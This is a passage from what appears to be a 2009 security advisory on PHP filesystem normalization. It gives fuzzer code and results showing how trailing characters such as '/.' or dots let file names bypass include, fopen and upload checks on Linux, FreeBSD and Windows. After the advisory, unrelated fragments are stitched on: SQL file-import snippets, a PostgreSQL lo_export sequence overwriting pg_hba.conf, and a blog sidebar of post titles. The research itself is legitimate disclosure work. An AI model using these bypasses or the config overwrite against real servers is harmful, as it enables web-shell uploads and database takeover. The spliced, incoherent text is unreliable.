was trying to open or save a file with one ore more dots at the end,
Windows was not denying the operation, but it was removing the dots in a
transparent way.

Mindful readers probably have already spotted the issue.

We wanted to take our time for a deeper investigation about what
normalization issues were available and how to take advantage of them
in order to exploit arbitrary local file inclusion/handling and uploads
functionalities (not only on Windows OS but also on GNU/Linux and *BSD).

Below you can find the sources of two simple "academic" fuzzers, later
results are discussed and finally POCs and conclusions are proposed.

II) PHP arbitrary Local File Inclusion testing

This tests include(), include_once(), require(), require_once() and
similiar functions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

alfi_fuzzer.php:

<?php

error_reporting(0);

$InterestingFile = "test_alfi.php";
$fh = @fopen($InterestingFile, 'w+');
fwrite($fh, "<?php ?>");
fclose($fh);

for ($i = 1; $i < 256; $i++) {
 $chri = chr($i);
 for ($j = 0; $j < 256; $j++) {
  $chrj = chr($j);
  for ($k = 0; $k < 256; $k++) {
    $chrk = chr($k);
    if($chri.$chrj.$chrk == '://') continue;
    if ($j == 0) $FuzzyFile = $InterestingFile.$chri;
    else if ($k == 0) $FuzzyFile = $InterestingFile.$chri.$chrj;
    else $FuzzyFile = $InterestingFile.$chri.$chrj.$chrk;
    if(include($FuzzyFile)) {
        print($i." ".$j." ".$k." [".$FuzzyFile."]\n");
        fclose($fh);
    }
    if($j == 0) break;
  }
 }
}

unlink($InterestingFile);

?>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Note: This code and the one that will be presented in section IV only
makes use of chars from the ASCII extended table (256 chars) to limit the
combinations because our intent was to test not only a malicious ending
char but a whole ending "extension" of 3 bytes.

A better fuzzer would include UTF-8. In the test we also do not
consider \x00, because this vector is already known [3, 4].

III) PHP arbitrary Local File Inclusion results

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo

PHPFS_MAD2 $ php alfi_fuzzer.php
47 46 46 [test_alfi.php/.]
47 47 47 [test_alfi.php//.]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo + Suhosin-Patch 0.9.27

PHPFS_MAD2 $ php alfi_fuzzer.php

[ NO RESULTS ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-FreeBSD 7.3 + Suhosin-Patch 0.9.7

PHPFS_MAD2 $ php alfi_fuzzer.php

[ NO RESULTS ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.3.0 Windows XP (WampServer 2.0i install)

C:\PHPFS_MAD2> php alfi_fuzzer.php
! Valid chars are: \x20 ( ), \x22 ("), \x2E (.), \x3C (<), \x3E (>)
! Valid strings are all combinations of the above chars.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.3.0 Windows Server 2008 (WampServer 2.0i install)

C:\PHPFS_MAD2> php alfi_fuzzer.php
! Valid chars are: \x20 ( ), \x22 ("), \x2E (.), \x3C (<), \x3E (>)
! Valid strings are all combinations of the above chars.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

IV) PHP arbitrary File Open testing

This tests fopen() and similiar functions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

afo_fuzzer.php:

<?php

error_reporting(0);

$MaliciousFile = "test_afo.php";

for ($i = 1; $i < 256; $i++) {
 $chri = chr($i);
 for ($j = 0; $j < 256; $j++) {
  $chrj = chr($j);
  for ($k = 0; $k < 256; $k++) {
    if ($j == 0) $FuzzyFile = $MaliciousFile.$chri;
    else if ($k == 0) $FuzzyFile = $MaliciousFile.$chri.$chrj;
    else $FuzzyFile = $MaliciousFile.$chri.$chrj.chr($k);
    $fh = @fopen($FuzzyFile, 'w+');
    if ($fh != FALSE) {
        fwrite($fh, $FuzzyFile);
        fclose($fh);
        if (file_exists($MaliciousFile)) {
            if ($j == 0) print($i." ");
            else if ($k == 0) print($i." ".$j." ");
            else $FuzzyFile = print($i." ".$j." ".$k." ");
            print("[".file_get_contents($MaliciousFile)."]\n");
            unlink($MaliciousFile);
        } else
            unlink($FuzzyFile);
    }
    if($j == 0)
        break;
  }
 }
}

?>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

V) PHP arbitrary File Open Fuzzer results

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo

PHPFS_MAD2 $ php afo_fuzzer.php
47 46 [test_afo.php/.]
47 47 46 [test_afo.php//.]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo + Suhosin-Patch 0.9.27

PHPFS_MAD2 $ php afo_fuzzer.php

[ NO RESULTS ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.2.10-FreeBSD 7.3 + Suhosin-Patch 0.9.7

PHPFS_MAD2 $ php afo_fuzzer.php

47 46 [test_afo.php/.]
47 47 46 [test_afo.php//.]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.3.0 Windows XP (WampServer 2.0i install)

C:\PHPFS_MAD2> php afo_fuzzer.php

! Valid chars are: \x2E (.), \x2F (/), \x5C (\)
! Valid strings are all combinations of the above chars.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.3.0 Windows Server 2008 (WampServer 2.0i install)

C:\PHPFS_MAD2> php afo_fuzzer.php

! Valid chars are: \x2E (.), \x2F (/), \x5C (\)
! Valid strings are all combinations of the above chars.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

VI) PHP arbitrary Remote File Upload testing

This tests move_uploaded_file() and similiar functions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

upload.php:

<?php

error_reporting(0);

$MaliciousFile = "evil.php";

if (isset($_GET['fuzzy'])) {
  $FuzzyDestination = $MaliciousFile.$_GET['fuzzy'];
  move_uploaded_file($_FILES['userfile']['tmp_name'], $FuzzyDestination);
  printf($FuzzyDestination);
  if (file_exists($MaliciousFile)) {
          echo "SUCCESS";
          unlink($MaliciousFile);
          exit();
  } else {
          unlink($FuzzyDestination);
  }
}

echo "FAIL";

?>

arfu_fuzzer.sh:

#!/bin/bash

touch "uploadtest.txt"
url="http://127.0.0.1/uploads/upload.php?fuzzy="

for i in {1..255}; do
 xi="%`printf %02x $i`"
 for j in {0..255}; do
  xj="%`printf %02x $j`"
  for k in {0..255}; do
   xk="%`printf %02x $k`"

   ext="$xi$xj$xk"
   [ $k -eq 0 ] && ext="$xi$xj"
   [ $k -eq 0 ] && [ $j -eq 0 ] && ext="$xi"

   response=`curl -kis -F "userfile=@uploadtest.txt;" $url$ext | grep
SUCCESS | wc -l`

   if [ "$response" == "1" ]; then
     echo "Found: $i $j $k -> ($ext)";
   fi

   [ $j -eq 0 ] && break

  done
 done
done

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

VII) PHP arbitrary Remote File Upload results

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo

PHPFS_MAD2 $ sh test_arfu.sh

FOUND: 47 0 0 -> (/)
FOUND: 47 46 0 -> (/.)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.2.10-pl0-Gentoo + Suhosin-Patch 0.9.27

PHPFS_MAD2 $ sh test_arfu.sh

FOUND: 47 0 0 -> (/)
FOUND: 47 46 0 -> (/.)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.2.10-FreeBSD 7.3 + Suhosin-Patch 0.9.7

PHPFS_MAD2 $ sh test_arfu.sh

FOUND: 47 46 0 -> (/.)

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-

PHP 5.3.0 Windows XP (WampServer 2.0i install)

PHPFS_MAD2 $ sh test_arfu.sh

[ All the combinations of (space), ., /, \ are valid ones. ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP 5.3.0 Windows Server 2008 (WampServer 2.0i install)

PHPFS_MAD2 $ sh test_arfu.sh

[ All the combinations of (space), ., /, \ are valid ones. ]

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

VIII) Conclusions

We found that it's possible to take advantage of filename normalization
routines in order to bypass common web application security routines,
detailed below:

- On GNU/Linux both (include|require)(_once)? functions will convert
  "foo.php" followed by one or more sequences of \x2F (/) and \x2E (.)
  back to "foo.php".
  This does not work if Suhosin patch is applied.

- On GNU/Linux the fopen function will convert "foo.php" followed by one
  or more sequences of \x2F (/) and \x2E (.) back to "foo.php".
  This does not work if Suhosin patch is applied.

- On GNU/Linux move_uploaded_file function will convert "foo.php"
  followed by one or more sequences of \x2F (/) and \x2E (.) back to
  "foo.php".
  This does work anyway *also* if Suhosin patch is applied.

- On FreeBSD the fopen function will convert "foo.php" followed by one
  or more sequences of \x2F (/) and \x2E (.) back to "foo.php".
  This does work anyway *also* if Suhosin patch is applied.
  Suhosin is shipped in the the default install.

- On FreeBSD the move_uploaded_file function will convert "foo.php"
  followed by one or more sequences of \x2F (/) and \x2E (.) back to
  "foo.php".
  This does work anyway *also* if Suhosin patch is applied.
  Suhosin is shipped in the the default install.

- On Windows OS both (include|require)(_once)? functions will convert
  "foo.php" followed by one or more of the chars \x20 ( ), \x22 ("),
  \x2E (.), \x3C (<), \x3E (>) back to "foo.php".

- On Windows OS the fopen function will convert "foo.php" followed by
  one or more of the chars \x2E (.), \x2F (/), \x5C (\) back to
  "foo.php".

- On Windows OS move_uploaded_file function will convert "foo.php"
  followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\)
  back to "foo.php".

  We have observed that some particular strings like "foo.php./" or
  "foo.php.\" force Windows to create a file called "foo.php.". It
  seems that Windows' functions do not contemplate the existence of
  a file with dots at the end (perhaps Windows hackers can better
  comment on this).

  All functions on that file will fail their attempt, so that it's not
  possible to easily delete or rename that file (one has to do del *
  or similiar).

IX) References

[1] http://www_ush_it/2009/02/08/php-filesystem-attack-vectors/
    http://www_ush_it/team/ush/hack-phpfs/phpfs_mad.txt
[2] http://www_ush_it/team/ush/hack-sugarcrm_520e/adv.txt
[3] http://www.securiteam.com/securitynews/5FP0C0KJPQ.html
[4] http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Credits (Out of band)

This article has been bought to you by the ush.it team. Giovanni
"evilaliv3" Pellerano, Antonio "s4tan" Parata and Francesco "ascii"
Ongaro are the ones who spent most hours on it with the precious help
of Alessandro "Jekil" Tanasi, Florin "Slippery" Iamandi and many other
friends.

Giovanni "evilaliv3" Pellerano
web site: http://www_ush_it/, http://www.evilaliv3.org/
mail: evilaliv3 AT ush DOT it

Antonio "s4tan" Parata
web site: http://www_ush_it/
mail: s4tan AT ush DOT it

Francesco "ascii" Ongaro
web site: http://www_ush_it/
mail: ascii AT ush DOT it

Alessandro "jekil" Tanasi
web site: http://www.tanasi.it/
mail: alessandro AT tanasi DOT it

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Legal Notices

Copyright (c) 2009 Francesco "ascii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the article is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

SELECT HEX(`blob`) FROM footable;

postgres=# CREATE TABLE foo (image OID);
CREATE TABLE
postgres=# INSERT INTO foo VALUES (lo_import('/tmp/bar.jpg'));
INSERT 0 1

postgres=# SELECT image FROM foo;
image
——-
16387
(1 row)
postgres=# SELECT ENCODE(data, 'base64') FROM pg_largeobject WHERE LOID=16387;
encode
——————————————————————————
JVBERi0xLjINJeLjz9MNCjIwOSAwIG9iag08PCANL0xpbmVhcml6ZWQgMSAN
IDYyOCA4NTEgXSANL0wgMjU4NDYxOCANL0UgMTI5NDg1IA0vTiAxNiANL
DWVuZG9iag0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
[snip..]
M2I4MWJkNTdlOTNjNWVmNj5dDT4+DXN0YXJ0eHJlZg0xNzMNJSVFT0YN
(1263 rows)

CREATE TABLE dbo.foo
(
image image NULL
)  ON [PRIMARY]
TEXTIMAGE_ON [PRIMARY]
GO

INSERT INTO [tempdb].[dbo].[foo]
([image])
SELECT * FROM
OPENROWSET(BULK N'C:\foo.bmp', SINGLE_BLOB) AS i
GO

create procedure sp_hexadecimal
@binvalue varbinary(255)
as
declare @charvalue varchar(255)
declare @i int
declare @length int
declare @hexstring char(16)

select @charvalue = '0x'
select @i = 1
select @length = datalength(@binvalue)
select @hexstring = "0123456789abcdef"

while (@i <= @length)
begin

declare @tempint int
declare @firstint int
declare @secondint int

select @tempint = convert(int, substring(@binvalue,@i,1))
select @firstint = floor(@tempint16)
select @secondint = @tempint - (@firstint*16)

select @charvalue = @charvalue +
substring(@hexstring, @firstint+1, 1) +
substring(@hexstring, @secondint+1, 1)

select @i = @i + 1

end

select 'sp_hexadecimal'=@charvalue

$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 mail.example.lan ESMTP Postfix

grep -E '<title>(.*?)</title>' itwiki-20081206-pages-meta-current.xml | \
cut -d '>' -f2| cut -d '<' -f1 | grep -v : | sed s/\(.*\)//g| sort | uniq

$ ls -al /etc/postgresql/8.3/main/
total 44
drwxr-xr-x 2 root     root      4096 2008-05-14 00:20 .
drwxr-xr-x 3 root     root      4096 2008-04-12 15:19 ..
-rw-r--r-- 1 root     root       316 2008-04-12 15:20 environment
-rw-r----- 1 postgres postgres  3845 2008-05-13 23:07 pg_hba.conf
-rw-r----- 1 postgres postgres  1460 2008-04-12 15:20 pg_ident.conf
-rw-r--r-- 1 postgres postgres 16682 2008-04-12 15:20 postgresql.conf
-rw-r--r-- 1 root     root       378 2008-04-12 15:20 start.conf

postgres=# SELECT setting FROM pg_settings WHERE name='data_directory';
setting
------------------------------
/var/lib/postgresql/8.3/main
(1 row)

postgres=# CREATE TABLE foo (
postgres(# bar oid,
postgres(# id int4,
postgres(# CONSTRAINT id PRIMARY KEY (id) ) WITHOUT OIDS;
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "id" for table "foo"
CREATE TABLE

postgres=# INSERT INTO foo VALUES (lo_import('/tmp/bar.bin'), 1);
INSERT 0 1

postgres=# SELECT lo_export(bar, '/etc/postgresql/8.3/main/pg_hba.conf') FROM
postgres+# foo WHERE id=1;
lo_export
-----------
1
(1 row)

postgres=# SELECT lo_create(-1);
lo_create
----------
24586
(1 row)

postgres=# UPDATE pg_largeobject SET data = (DECODE('YW50YW5p', 'base64'))
postgres+# WHERE LOID = 24586;
UPDATE 1

postgres=# SELECT lo_export(24586, '/etc/postgresql/8.3/main/pg_hba.conf');
lo_export
-----------
1
(1 row)


	Super user	User
Write files with COPY	YES	NO
Write files with lo_export()	YES	NO
Write file via extension	YES	NO

Alessandro Tanasi @jekil's blog

UDPot updated and new docker

EyePyramid: I forgot to do my homework!

A Raspberry Pi Home Dashboard

What you’ll need

OS Setup

OS Configuration

X Setup

Bonus

Enjoy

A Lufthansa Horror Story

How to setup an Image Forensic lab with Ghiro

1. Ready for virtualization

2. GET Ghiro Appliance

3. Import Appliance

4. Network Configuration

5. Start and Play

Ghiro and Image Forensics Forum is opening

Continuous Integration Services I Like

Coveralls.io

DRONE.IO

Landscape.io

Requires.io

Travis CI

Cuckoo GSOC: about winners and winners

This OVF package requires unsupported hardware

Cuckoo Sandbox Summer of Code 2015

Cuckoo Projects

Who is eligible?

Where to start?

How to apply?

Get in touch

Links you need

Cuckoo Sandbox 1.2 released

New Ghiro website

How to clean data in Cuckoo Sandbox

Ghiro 0.2 released

Ghiro Appliance Building

Silk Road 2 Seized: FBI Report Highlights

Names and virtual host discovery

Ghiro 0.2 preview video

Bringing up VirtualBox interface before starting Cuckoo

Ghiro development repository moved

Running Ghiro appliance on ESXi

Such Cuckoo, much sandbox: dogeon report

Cuckoo Sandbox 1.1 released

Homemade custom interaction DNS honeypot

New tool for image forensics

Vtiger CRM 5.2.0 Multiple Vulnerabilities @ Ush.it

DEFCON 18 CTF quals - Forensic 200 writeup

DEFCON 18 CTF quals - Forensic 100 writeup

hostmap 0.2.2 released

Introduction

Changes

Download

Documentation

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection @ Ush.it

hostmap 0.2.1 released

Introduction

Changes

Download

Documentation

hostmap 0.2 released

Introduction

Changes

Download

Documentation

Website defacement detection techniques

Table of Contents

1. Website defacement

2. Anomaly detection systems

2.1 Checksum comparison

2.2 Diff comparison

2.3 DOM tree analysis

2.4 Complex algorithms

3. Signature detection

4. Thresholds and worst cases

PHP Filesystem Attack Vectors @ Ush.it

Follow Secdocs on Twitter

hostmap 0.1 released